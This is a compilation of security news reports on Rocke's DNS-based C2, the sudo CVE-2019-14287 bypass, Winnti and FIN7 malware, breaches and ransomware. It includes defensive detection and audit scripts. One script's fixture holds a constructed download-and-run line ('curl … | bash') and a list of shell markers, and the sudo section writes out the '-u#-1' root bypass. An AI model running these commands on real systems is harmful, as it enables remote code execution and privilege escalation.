“Rocke, a China-based cryptomining threat actor, has changed its Command and Control (C2) infrastructure away from Pastebin to a self-hosted solution during the summer of 2019.” reads the analysis published by the security firm Anomali. “the actor moved away from hosting the scripts on dedicated servers and instead started to use Domain Name System (DNS) text records. These records are accessed via normal DNS queries or DNS-over-HTTPs (DoH) if the DNS query fails. In addition to the C2 change, functionality was also added to their LSD malware to exploit ActiveMQ servers vulnerable to CVE-2016-3088.”

The use of self-hosted infrastructure and DNS TXT records makes the group’s operations harder to detect and to take down: the scripts no longer sit on a single paste or web host that can be reported and removed, and the fetches blend in with ordinary DNS (or HTTPS, in the DoH fallback) traffic. The new LSD sample was first spotted on September 17, as shown in the following graph.
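Scripts delivered through DNS TXT answers, with DoH as a fallback, still leave traces in DNS and proxy logs. The following detection heuristic is an added example written for this page, not code from Anomali’s report: it scans constructed log lines (the host names, addresses and the script payload are made up) and flags TXT answers that are long base64 blobs decoding to shell-like text, as well as HTTPS requests to a DoH endpoint path. Neither test is specific to Rocke; both are starting points to tune against the indicators in the report.

```python
import base64
import re

# What a DNS-TXT-hosted installer could look like. CONSTRUCTED for this example:
# the address 10.0.0.99 and the script name are made up.
FAKE_SCRIPT = b"#!/bin/bash\ncurl -fsSL http://10.0.0.99/x.sh | bash\n"
FAKE_TXT = base64.b64encode(FAKE_SCRIPT).decode()

# CONSTRUCTED log lines: <ts> <src_ip> <proto> <kind> <name> <data>
# proto=dns:   kind=qtype,  name=qname,  data=answer
# proto=https: kind=method, name=server, data=URL path
SAMPLE_LOG = "\n".join([
    "1568700001 10.0.0.5 dns A www.example.com 93.184.216.34",
    "1568700002 10.0.0.5 dns TXT example.com v=spf1 include:_spf.example.com -all",
    "1568700003 10.0.0.7 dns TXT t.attacker.invalid " + FAKE_TXT,
    "1568700004 10.0.0.7 https POST 1.1.1.1 /dns-query",
    "1568700005 10.0.0.8 https GET www.example.com /index.html",
])

SHELL_MARKERS = (b"#!/bin/", b"curl ", b"wget ", b"| bash", b"| sh", b"chmod +x", b"crontab")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")   # one long base64 token, no SPF/DKIM punctuation
DOH_PATHS = ("/dns-query", "/resolve")               # RFC 8484 and common JSON resolver endpoints


def looks_like_script_payload(txt):
    """True if a TXT answer is a long base64 blob that decodes to shell-like text."""
    compact = txt.replace('"', "").replace(" ", "")   # TXT strings are often split and quoted
    if not B64_RE.match(compact):
        return False
    try:
        raw = base64.b64decode(compact, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return False
    return any(marker in raw for marker in SHELL_MARKERS)


def scan(log_text):
    """Return [(src_ip, reason)] for lines matching the two Rocke C2 patterns."""
    alerts = []
    for line in log_text.splitlines():
        fields = line.split(maxsplit=5)
        if len(fields) != 6:
            continue
        _ts, src, proto, kind, name, data = fields
        if proto == "dns" and kind == "TXT" and looks_like_script_payload(data):
            alerts.append((src, f"TXT record for {name} decodes to a shell script"))
        elif proto == "https" and data.startswith(DOH_PATHS):
            alerts.append((src, f"DNS-over-HTTPS query to {name}{data}"))
    return alerts


if __name__ == "__main__":
    for src, reason in scan(SAMPLE_LOG):
        print(f"ALERT {src}: {reason}")
```

The DoH check only works where TLS is terminated or the URL path is otherwise visible (an explicit proxy, or a host agent); on a plain network tap, fall back to flagging connections to known resolver endpoints from hosts that have no business using DoH.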

The group also improved its LSD dropper by adding code to exploit CVE-2016-3088 in ActiveMQ servers.

In order to ensure that only its miner is running on the infected machine, the group attempts to kill any other process with high CPU usage. The LSD malware checks the MD5 hash of the process binaries to avoid killing its own instance running on the system.

“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity,” concludes Anomali Labs.

“It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future.”

Technical details, including Indicators of Compromise, are reported in the analysis published by Anomali.

Pierluigi Paganini

(SecurityAffairs – Rocke cybercrime gang, miner)

Adobe out-of-band security updates address 82 flaws in 3 products

Adobe has released out-of-band security updates to address a total of 82 security vulnerabilities that affect three products of the company.

On Tuesday, Adobe released out-of-band security updates to address 82 flaws in Acrobat and Reader, Experience Manager, Experience Manager Forms, and Download Manager.

Out of 82 security flaws, 45 vulnerabilities affecting Adobe Acrobat and Reader have been rated critical. The exploitation of the flaws could lead to arbitrary code execution in the context of the current user.

The company also addressed 23 important-rated out-of-bounds read and cross-site scripting issues that could lead to information disclosure.

A majority of critical-rated vulnerabilities (i.e., 26) in Adobe Acrobat and Reader reside due to use-after-free, 6 due to out-of-bounds write, 4 are type confusion bugs, 4 due to untrusted pointer dereference, 3 are heap overflow bugs, one buffer overrun and one race condition issue.

Adobe fixed a privilege escalation flaw in Download Manager for Windows that is caused by insecure file permissions.

Adobe also addressed a dozen flaws in the Experience Manager marketing solution. An attacker could exploit the vulnerabilities to gain unauthorized access to an organization’s Experience Manager environment.

The company also fixed an XSS flaw in Experience Manager Forms that could lead to the disclosure of sensitive information.

The good news is that Adobe is not aware of any attacks exploiting the vulnerabilities in the wild.

Pierluigi Paganini

(SecurityAffairs – hacking, security updates)

Click2Mail suffered a data breach that potentially impacts 200,000 registrants

Click2Mail.com, a US Postal Service affiliate partner, has suffered a data breach that exposed the personal information of its users.

The US Postal Service affiliate partner Click2Mail has suffered a data breach that exposed the personal information of its users.

The company allows its users to professionally print letters, flyers or postcards and deliver them in a business day at low prices.

It also allows users to manage mailing lists conveniently through the web browser. The company is sending out data breach notices to its impacted users.

The incident was first reported by DataBreaches.net, which was contacted by a former customer of Click2Mail who suspected that Click2Mail may have been hacked. The security breach was discovered on October 4, 2019.

Exposed users’ data include name, organization name, account mailing address, email address, and phone number. The company pointed out that it doesn’t store users’ financial data.

“We have learned that your personal information, including name, organization name, account mailing address, email address, and phone number may have been compromised.” reads the data breach notice sent to the users. “On October 4th, 2019 it was discovered that registered Click2Mail users’ names and email addresses were being used by unknown parties to send multiple spam emails. Technical analysis of our systems detected an intrusion point that was closed that same day.”

Click2Mail logo

The company hired a cyber-security firm to help its staff in investigating the incident.

Lee Garvey, President and CEO of Click2Mail confirmed that the company is going to notify the incident to its 200,000 Click2Mail.com registrants.

“In a follow-up communication, Lee Garvey, President and CEO of Click2Mail, informs this site that slightly more than 200,000 Click2Mail.com registrants will be receiving notifications, which will be sent out in segments, not all at once.” states a post published on databreaches.net. “Garvey also explained that prior to receiving this site’s email inquiry, they had received an email from a helpful customer who had used a tagged email address and was getting spam.  From the description, it sounds like the same former customer who contacted this site to alert us to their suspicions that Click2Mail had been hacked.”

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack

The global shipping and mailing services company Pitney Bowes suffered a partial outage of its service caused by a ransomware attack.

Pitney Bowes announced that a ransomware attack infected its systems and caused a partial system outage that made some of its services unavailable to some customers. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

“Pitney Bowes was affected by a malware attack that encrypted information on some systems and disrupted customer access to some of our services. At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” reads a press release published by the company.

The good news is that there is no evidence that hackers accessed company information. The company has hired an external security firm to support its investigation into the security breach.

The mailing system products were paralyzed by the attack, the company confirmed that the following systems are currently NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company pointed out that even if customers will not be able to refill their postage meters until the systems are restored, they will still be able to print postage as long as they have funds on the meter.

Clients with Mail360 and MIPro Licensing products have no access to Your Account, Data fulfillment, and some of our Support pages, with Software and Data Marketplace downloads being unavailable.

For Commerce Services clients, the impacted solutions include Fulfillment, Delivery and Returns, and Presort services.

The Software and Data products are not affected by the ransomware attacks because they do not access the backend systems of the Pitney Bowes network.

Customers can visit the page www.pb.com/systemupdate to receive up to date information on the incident.

Pierluigi Paganini

(SecurityAffairs – Pitney Bowes, hacking)

sudo flaw allows any users to run commands as Root on Linux

Experts discovered a security policy bypass issue in the Sudo utility that is installed as a command on almost every Linux and Unix system.

The Sudo utility that is installed as a command on almost every Linux and Unix system is affected by a security policy bypass issue tracked as CVE-2019-14287.

The vulnerability could be exploited by an ill-intentioned user or a malicious program to execute arbitrary commands as root on a targeted Linux system, even if the sudoers configuration explicitly disallows running commands as root.

sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for “superuser do” as the older versions of sudo were designed to run commands only as the superuser.

“When sudo is configured to allow a user to run commands as an arbitrary user via the ALL keyword in a Runas specification, it is possible to run commands as root by specifying the user ID -1 or 4294967295.” reads the security advisory.

“This can be used by a user with sufficient sudo privileges to run commands as root even if the Runas specification explicitly disallows root access as long as the ALL keyword is listed first in the Runas specification.

Log entries for commands run this way will list the target user as 4294967295 instead of root. In addition, PAM session modules will not be run for the command.”

Unlike su, sudo by default asks users for their own password rather than the password of the target user. Once the user is authenticated, and if the configuration file (/etc/sudoers) permits the access, the system invokes the requested command.

Administrators configure the sudoers file to define which users are allowed to run which commands as which target users.

Due to the CVE-2019-14287 flaw, even if a user is not allowed to run a specific command as root, it is possible to bypass the restriction.

An attacker can exploit the vulnerability to run commands as root simply by specifying the user ID “-1” or “4294967295” (the same value read as an unsigned 32-bit integer). This works because the requested ID matches neither the name root nor uid 0 when it is checked against the !root exclusion in the Runas list, so the command is allowed; the system calls sudo then uses to switch user, setresuid(2) and setreuid(2), treat an ID of -1 as “leave this ID unchanged”, so the process keeps running with root’s uid 0.

“Fixed CVE-2019-14287, a bug where a sudo user may be able to run a command as root when the Runas specification explicitly disallows root access as long as the ALL keyword is listed first.” states the advisory.

So, even if a user has been restricted to run a specific, or any, command as root, the vulnerability could allow the user to bypass this security policy and completely take over the system.

“Exploiting the bug requires that the user have sudo privileges that allow them to run commands with an arbitrary user ID. Typically, this means that the user’s sudoers entry has the special value ALL in the Runas specifier.” continues the advisory.

“Additionally, because the user ID specified via the -u option does not exist in the password database, no PAM session modules will be run.

If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction. For example, given the following sudoers entry:”

    myhost bob = (ALL, !root) /usr/bin/vi

User bob is allowed to run vi as any user but root. However, due to the bug, bob is actually able to run vi as root by running sudo -u#-1 vi, violating the security policy.”

The CVE-2019-14287 vulnerability was discovered by Joe Vennix of Apple Information Security, it affects Sudo versions prior to 1.8.28.

Linux users are urged to update the sudo package to version 1.8.28 or later as soon as it is available for their distribution. Until then, administrators should review their sudoers files for Runas specifications that use the ALL keyword, in particular those that rely on a !root exclusion.
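A quick way to check whether a host is exposed, as an added example written for this page and not code from the sudo project: the script flags sudoers entries whose Runas list starts with ALL and then excludes root (the (ALL, !root) pattern from the advisory above, or its numeric form !#0), and compares a sudo --version string against 1.8.28. The sudoers excerpt is constructed; the standard entry order is user, then host.

```python
import re

# CONSTRUCTED sudoers excerpt in the standard "user host = (runas) command" form,
# not any real system's file.
SUDOERS_SAMPLE = """\
Defaults    env_reset
root        ALL = (ALL:ALL) ALL
bob         myhost = (ALL, !root) /usr/bin/vi
alice       ALL = (ALL, !#0) /usr/bin/less
carol       ALL = (www-data) /usr/bin/tail
dave        ALL = (ALL) NOPASSWD: /usr/bin/systemctl
"""

ENTRY_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")
FIXED_VERSION = (1, 8, 28)


def runas_users(runas):
    """'ALL, !root : ALL' -> ['ALL', '!root']: keep the user list, drop the group list after ':'."""
    users = runas.split(":", 1)[0]
    return [u.strip() for u in users.split(",") if u.strip()]


def entry_affected(runas):
    """CVE-2019-14287 applies when ALL is listed first and root is excluded afterwards:
    sudo -u#-1 passes the exclusion (it is neither 'root' nor uid 0 to the matcher)
    yet leaves the process running as uid 0."""
    users = runas_users(runas)
    if not users or users[0] != "ALL":
        return False
    return any(u in ("!root", "!#0") for u in users[1:])


def audit_sudoers(text):
    """Return (user, host, runas, cmds) for entries whose root exclusion is bypassable."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = ENTRY_RE.match(line)
        if m and entry_affected(m["runas"]):
            findings.append((m["user"], m["host"], m["runas"], m["cmds"]))
    return findings


def sudo_is_vulnerable(version_output):
    """Parse the first line of `sudo --version` ("Sudo version 1.8.27") and compare with 1.8.28."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", version_output)
    if not m:
        raise ValueError("no version number found")
    return tuple(int(x) for x in m.groups()) < FIXED_VERSION


if __name__ == "__main__":
    for user, host, runas, cmds in audit_sudoers(SUDOERS_SAMPLE):
        print(f"{user}@{host}: ({runas}) {cmds}  <- root exclusion bypassable on sudo < 1.8.28")
    for v in ("Sudo version 1.8.27", "Sudo version 1.8.28p1", "Sudo version 1.9.0"):
        print(v, "vulnerable" if sudo_is_vulnerable(v) else "fixed")
```

On a real host, feed it `visudo -c -f /etc/sudoers` output or the files under /etc/sudoers.d and the first line of `sudo --version`; distributions that backport the fix without bumping the version number need to be checked against the vendor’s changelog instead.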

Pierluigi Paganini

(SecurityAffairs – Linux, Sudo)

Winnti Group was planning a devastating supply-chain attack against Asian manufacturer

Winnti Group is back with a new modular Windows backdoor that was used to infect the servers of a high-profile Asian mobile hardware and software manufacturer.

Security experts at ESET revealed that the Winnti Group continues to update its arsenal: they observed the China-linked APT group using a new modular Windows backdoor to infect the servers of a high-profile Asian mobile hardware and software manufacturer.

Researchers also discovered that the APT group used an updated version of its ShadowPad malware. The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEAD, PassCV, Wicked Panda, and ShadowPad.

Experts analyzed recent supply chain attacks against the gaming industry in Asia and noticed the use of a unique packer in a backdoor dubbed PortReuse.

“After analyzing the custom packer used by the Winnti Group, we started hunting for more executable files with this packer, in the hope of unearthing other compromised software used in supply-chain attacks. What we’ve found is not exactly what we were looking for to begin with. Instead of finding compromised software, we discovered a new listening-mode modular backdoor that uses the same packer. We believe its authors call it PortReuse.” reads the paper published by ESET. “This is not a random name: this backdoor injects into a running process already listening on a TCP port, “reusing” an already open port. It hooks the receiving function and waits for a “magic” packet to trigger the malicious behavior. The legitimate traffic is forwarded to the real application, so it is effectively not blocking any legitimate activity on the compromised server. This type of backdoor is sometimes called a passive network implant.”

In the attack against a video game developer, the malware was being distributed via a game’s official update server.

The PortReuse backdoor has a modular architecture, experts discovered that its components are separate processes that communicate through named pipes. Experts detected multiple PortReuse variants with a different NetAgent but using the same SK3. Each variant spotted by the experts was targeting different services and ports, including DNS over TCP (53), HTTP (80), HTTPS (443), Remote Desktop Protocol (3389) and Windows Remote Management (5985).

The backdoor malware is being served in the following ways:

  • Embedded in a .NET application launching the initial Winnti packer;
  • In a VB script that invokes a .NET object that launches the packer;
  • In an executable that has the packer directly at the entry point;

PortReuse doesn’t need command and control (C2) servers; instead, its NetAgent component listens on sockets that are already open. The attacker only needs to connect directly to the compromised host.

“The PortReuse backdoor does not use a C&C server; it waits for an incoming connection that sends a “magic” packet. To do so, it doesn’t open an additional TCP port; it injects into an existing process to “reuse” a port that is already open. To be able to parse incoming data to search for the magic packet, two techniques are used: hooking of the receiving function (WSARecv or even the lower level NtDeviceIoControlFile) or registering a handler for a specific URL resource on an IIS server using HttpAddUrl with a URLPrefix.” continues the analysis.

ESET was able to identify one company that was hit by a variant of the PortReuse backdoor that injects itself within Microsoft IIS using a “GET request and inspecting the Server and Content-Length headers.” Using the Censys search engine the experts discovered eight infected machines belonging to the same organization having indicators of compromise that were matching the PortReuse infection.

The organization is a major mobile hardware and software manufacturer based in Asia; the experts contacted it to alert the company of the infection.

“It is possible that the Winnti Group was planning a devastating supply-chain attack by compromising this organization,” concludes the analysis.

“The Winnti Group is still very active in 2019 and continues to target both gaming and other industries. The update to the ShadowPad malware shows they are still developing and using it. The relatively new PortReuse malware also shows they update their arsenal and give themselves an additional way to compromise their victims for a long period of time.”

Pierluigi Paganini

(SecurityAffairs – Winnti, malware)

Privacy advocates criticize Apple for sharing some users browsing data with Tencent

New problems for Apple: most of its users likely do not know that the company is sharing the iOS web browsing data of some of them with the Chinese giant Tencent.

Most Apple users likely don’t know that the tech giant is sending iOS web browsing data on some of them to the Chinese giant Tencent.

The news is worrying, starting from at least iOS 12.2, Apple has integrated the “Tencent Safe Browsing” to improve security of its users and protect them from fraudulent websites. The Tencent Safe Browsing does it by implementing the “Fraudulent Website Warning” feature in the Safari web browser for both iOS and macOS that checks every site visited by the users.

Apple secure browsing

The service leverages a blacklist of malicious websites that is continuously updated. The blacklist was initially provided only by Google’s Safe Browsing service. In order to warn users before they visit malicious websites, a blacklisting service has to receive information about the websites a user visits (Apple says this is a value computed from the URL rather than the URL itself) and may also log the user’s IP address. At this time, it’s not clear whether Tencent is also collecting IP addresses from users residing outside of China; most likely Tencent’s blacklist is only used for Chinese users, because Google’s services are blocked in the country.

“Before visiting a website, Safari may send information calculated from the website address to Google Safe Browsing and Tencent Safe Browsing to check if the website is fraudulent. These safe browsing providers may also log your IP address,” Apple notes.

Experts fear that Tencent could have access to the same data sent to Google and intelligence experts believe that it could share the same information with the Chinese government.

“Tencent works closely with the Chinese Communist Party. It facilitates government censorship in China through its multi-functional utility app WeChat.” reported the website reclaimthenet.org. “The company also released a pro-Chinese Communist Party game called Clap for Xi Jinping: An Awesome Speech in 2017 which, as the title suggests, encourages users to virtually clap for the Chinese president Xi Jinping. In addition to this, Tencent is reportedly collaborating with the Chinese Communist Party to develop “patriotic” video games.”

Privacy advocates believe that such major changes should be disclosed to users.

The good news is that users can turn off the Fraudulent Website Warning feature in Safari, although they then lose the warnings about known fraudulent sites.

The feature is enabled by default on iPhones and iPads devices running iOS 13, below the instruction to disable it:

  • iOS: Settings > Safari > Turn off Fraudulent Website Warning
  • macOS: Safari > Preferences > Security > Uncheck Warn when visiting a fraudulent website

Pierluigi Paganini

(SecurityAffairs – Apple, privacy)

Talos experts found 11 flaws in Schneider Electric Modicon Controllers

Cisco Talos experts discovered nearly a dozen flaws affecting some of the models of Schneider Electric’s Modicon programmable logic controllers.

Talos experts discovered 11 security flaws affecting some models of Schneider Electric’s Modicon programmable logic controllers.

Affected models are Modicon M580, M340, BMENOC 0311, BMENOC 0321, Quantum, Premium, and Modicon BMxCRA and 140CRA.

The only model affected by all the vulnerabilities is the M580 PLC. The flaws affect the implementation of the Modbus, FTP and TFTP protocols, and the REST API. Schneider Electric published four advisories to address the vulnerabilities.

The vulnerabilities were assigned identifiers from CVE-2019-6841 through CVE-2019-6851; an attacker could exploit them by sending specially crafted requests to the affected devices.

The vulnerability in the TFTP protocol, tracked as CVE-2019-6851, is a File and Directory Information Exposure issue that could cause the disclosure of information from the controller when using this protocol.

REST API is affected by three vulnerabilities, CVE-2019-6848, CVE-2019-6849, CVE-2019-6850.

CVE-2019-6848 is an uncaught exception issue that could be exploited to cause a Denial of Service condition by sending specific data on the REST API of the controller/communication module.

CVE-2019-6849 is an Information Exposure vulnerability that could cause the disclosure of sensitive information when using specific Modbus services provided by the REST API of the controller/communication module.

CVE-2019-6850 is another Information Exposure vulnerability that could cause the disclosure of sensitive information when reading specific registers with the REST API of the controller/communication module.

Most of the vulnerabilities in the FTP protocol (CVE-2019-6841, CVE-2019-6842, CVE-2019-6843, CVE-2019-6844, CVE-2019-6846, CVE-2019-6847) could be exploited to cause a DoS condition.

Talos researchers reported the vulnerabilities to Schneider Electric in May and July. The company’s advisories provide a series of recommendations for preventing the exploitation of the issues. Talos blog post also includes SNORT rules to detect exploitation attempts.

Pierluigi Paganini

(SecurityAffairs – Schneider Electric Modicon, hacking)

Charming Kitten Campaign involved new impersonation methods

Iran-linked APT group Charming Kitten employed new spear-phishing methods in attacks carried out between August and September.

Security experts at ClearSky analyzed attacks recently uncovered by Microsoft that targeted a US presidential candidate, government officials, journalists, and prominent expatriate Iranians. Microsoft Threat Intelligence Center (MSTIC) observed the APT group making more than 2,700 attempts to identify consumer email accounts belonging to specific Microsoft customers and then attack 241 of those accounts.

ClearSky researchers pointed out that these attacks represent a shift in the group tactics because this is the first time that the Charming Kitten group attempted to interfere in the elections of a foreign country.

The experts said, with medium-high confidence, that the campaign uncovered by Microsoft is the same campaign they observed over the past several months.

“We evaluate in a medium-high level of confidence, that Microsoft’s discovery and our findings in our previous and existing reports is a congruent operation” reads the report published by ClearSky, “based on the following issues:

  • Same victim profiles
  • Time overlapping
  • Similar attack vectors”

The Iran-linked Charming Kitten group (aka APT35, Phosphorus, Newscaster, and Ajax Security Team) made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011. 

As part of the recently observed campaign, the state-sponsored hackers used three different spear-phishing methods:

  • Sending an email message that leverages social engineering methods.
  • Impersonating social media websites, such as Facebook, Twitter and Instagram, and using these social media to spread malicious links. Experts also observed a few social media personas that contacted victims in order to trick them into visiting malicious websites.
  • Sending SMS messages to the victim’s mobile phone. The messages include a link and claim to inform the recipient of an attempt to compromise their email account; the link points to a malicious phishing website.

Experts have identified more than eight new and previously unknown domains, all under the ‘.site’ TLD, that were involved in the attacks.

Other technical information, along with indicators of compromise (IoCs) are included in the report.

Pierluigi Paganini

(SecurityAffairs – Charming Kitten, Iran)

Alabama Hospital chain paid ransom to resume operations after ransomware attack

An Alabama hospital chain announced to have restored normal operation after paying the ransom request by crooks that infected its systems with ransomware.

A hospital chain in west Alabama was recently hit by a ransomware attack that paralyzed its systems. The organization opted to pay the ransom and announced that it has restored normal operations.

The hospital chain hasn’t revealed the amount it paid to the crooks to decrypt the data; it seems that insurance covered the cost.

Recently I reported that several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut down part of their IT infrastructure. At the time, a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center in West Alabama’s Tuscaloosa, Northport, and Fayette, revealed that the facilities had limited access to their computing systems.

“The DCH Health System said its hospitals in the west Alabama cities of Tuscaloosa, Northport and Fayette resumed admitting patients Thursday, and its imaging and patient scheduling services were going back online Friday.” reads the post published by the Associated Press.

The operations at the hospitals were severely impacted for 10 days during which the hospitals kept treating people, but new patients were sent to other hospitals in Birmingham or Mississippi.

“We had to gain access to our system quickly and gain the information it was blocking,” chief operating officer Paul Betz told a news conference. “As time goes by, and we determine the full impact of this, we will be very grateful we had cyber insurance in place.”

The systems at the hospitals were infected with a variant of the Ryuk ransomware; internal staff reverted to using paper files.

“A statement from the system said workers were still restoring some nonessential systems including email and were trying to get programs operating at full speed.” continues the post.

The three hospitals admitted more than 32,000 patients last year.

A few weeks ago, the Campbell County Memorial Hospital in Gillette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks; in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the city of Riviera Beach agreed to pay $600,000 in ransom to decrypt its data after a ransomware attack hit its computer systems. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)


Security Affairs newsletter Round 235

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folks, let me inform you that I have suspended the newsletter service; anyway, I’ll continue to provide you with a list of published posts every week through the blog.

Hacker is auctioning a database containing details of 92 million Brazilians
Iran-linked Phosphorus group hit a 2020 presidential campaign
UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities
D-Link router models affected by remote code execution issue that will not be fixed
Data from Sephora and StreetEasy data breaches added to HIBP
PoS malware infections impacted four restaurant chains in the U.S.
US will help Baltic states to secure baltic energy grid
Developer hacked back Muhstik ransomware crew and released keys
Experts found a link between a Magecart group and Cobalt Group
Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild
MS October 2019 Patch Tuesday updates address 59 flaws
Users reported problems with patches for CVE-2019-1367 IE zero-day
Hackers compromised Volusion infrastructure to siphon card details from thousands of sites
Multiple APT groups are exploiting VPN vulnerabilities, NSA warns
Researchers discovered a code execution flaw in NSA GHIDRA
Twitter inadvertently used Phone Numbers collected for security for Ads
vBulletin addresses three new high-severity vulnerabilities
Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware
Attor malware was developed by one of the most sophisticated espionage groups
iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware
Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012
SAP October 2019 Security Patch Day fixes 2 critical flaws
Tor Project is going to remove End-Of-Life relays from the network
Hacker breached escort forums in Italy and the Netherlands and is selling user data
Researchers released a free decryptor for the Nemty Ransomware
Sophos fixed a critical vulnerability in Cyberoam firewalls
Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics
Top cybersecurity certifications to consider for your IT career
FIN7 Hackers group is back with a new loader and a new RAT
Leafly Cannabis information platform suffered a data leak
SIM cards used in 29 countries are vulnerable to Simjacker attack

Pierluigi Paganini

(SecurityAffairs – newsletter)


A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns

Confiant researchers have discovered a new Mac malware dubbed Tarmac distributed via malvertising campaigns in the US, Italy, and Japan.

Security experts at Confiant have discovered a new Mac malware dubbed Tarmac that is distributed via malvertising campaigns in the US, Italy, and Japan.

“Malicious ads redirect victims to sites showing popups peddling software updates, mainly Adobe Flash Player updates, that once executed will first install the OSX/Shlayer MacOS malware, which then executes the final payload, the OSX/Tarmac” reads the analysis.

“Indeed, that’s not the official Adobe installer but a fake Flash Player installer that was signed using an Apple developer certificate 2L27TJZBZM issued probably to a fake identity named Fajar Budiarto.”

Malware authors usually sign malware with Apple developer certificates because it is quite easy to do and allows their code to bypass security protections like Gatekeeper and XProtect.

Tarmac

This malvertising campaign distributing the two malware Shlayer and Tarmac began in January, but at the time experts did not spot the Tarmac malicious code.

Tarmac acts as a second-stage payload for the Shlayer infection; experts pointed out that at the time of the analysis the command and control servers had been shut down and the samples they analyzed were relatively old. Experts believe the campaign is still ongoing and that the threat actors likely changed their infrastructure.

Tarmac gathers information about the infected hardware and sends it to the C2 servers, then it waits for commands.

At the time of the analysis, it was not possible to understand which commands the malware supports because the C&C servers were down.

Experts noticed that most of the key component strings are protected with custom encryption and compression in an attempt to thwart analysis.

ZDNet reported that the malvertising campaign that distributed the Shlayer and Tarmac combo was targeted at users located in the US, Italy, and Japan.

The analysis published by the experts also includes additional technical details along with indicators of compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – Tarmac, malvertising)


FIN7 Hackers group is back with a new loader and a new RAT

FireEye Mandiant discovered that the FIN7 hacking group added new tools to its cyber arsenal, including a module that targets the remote administration software of an ATM vendor.

Security experts at FireEye Mandiant discovered that the FIN7 hacking group has added new tools to its arsenal, including a new loader and a module that hooks into the legitimate remote administration software used by the ATM maker NCR Corporation.

The group, active since late 2015, has targeted businesses worldwide to steal payment card information. FIN7 is suspected to have hit more than 100 US companies, most of them in the restaurant, hospitality, and industries.

In August 2018, three members of the notorious cybercrime gang have been indicted and charged with 26 felony counts of conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft.

The new loader, dubbed BOOSTWRITE, drops the malware directly in memory and allows threat actors to load several malicious payloads, including the Carbanak backdoor.

Researchers also spotted a new RAT tracked as RDFSNIFFER that is dropped by the BOOSTWRITE loader.

“The first of FIN7’s new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER.” reads the Mandiant report. “While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators.”

BOOSTWRITE implements the DLL search order hijacking technique to load its DLLs into the target’s memory; it then downloads the initialization vector (IV) and the decryption key needed to decrypt its two embedded payload DLLs.

The loader performs sanity checks on the decrypted PE32 DLL payloads before loading them into memory.

The researchers analyzed several samples of BOOSTWRITE; one of them, uploaded to VirusTotal on October 3, was signed with a code signing certificate issued to MANGO ENTERPRISE LIMITED.

fin7 detection

The loader was observed delivering the RDFSNIFFER DLL which allows an attacker to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions.

RDFSNIFFER hooks the process of NCR Corporation’s RDFClient; it runs every time the legitimate remote administration software is executed on the compromised machines.

The malicious code is designed to run man-in-the-middle attacks on connections made using RDFClient; it also allows attackers to upload, download, execute and/or delete arbitrary files.

Below the list of supported commands:

Command Name   Legit Function in RDFClient   RDFClient Command ID   Description
Upload         FileMgrSendFile               107                    Uploads a file to the remote system
Download       FileMgrGetFile                108                    Retrieves a file from the remote system
Execute        RunCommand                    3001                   Executes a command on the remote system
DeleteRemote   FileMgrDeleteFile             3019                   Deletes a file on the remote system
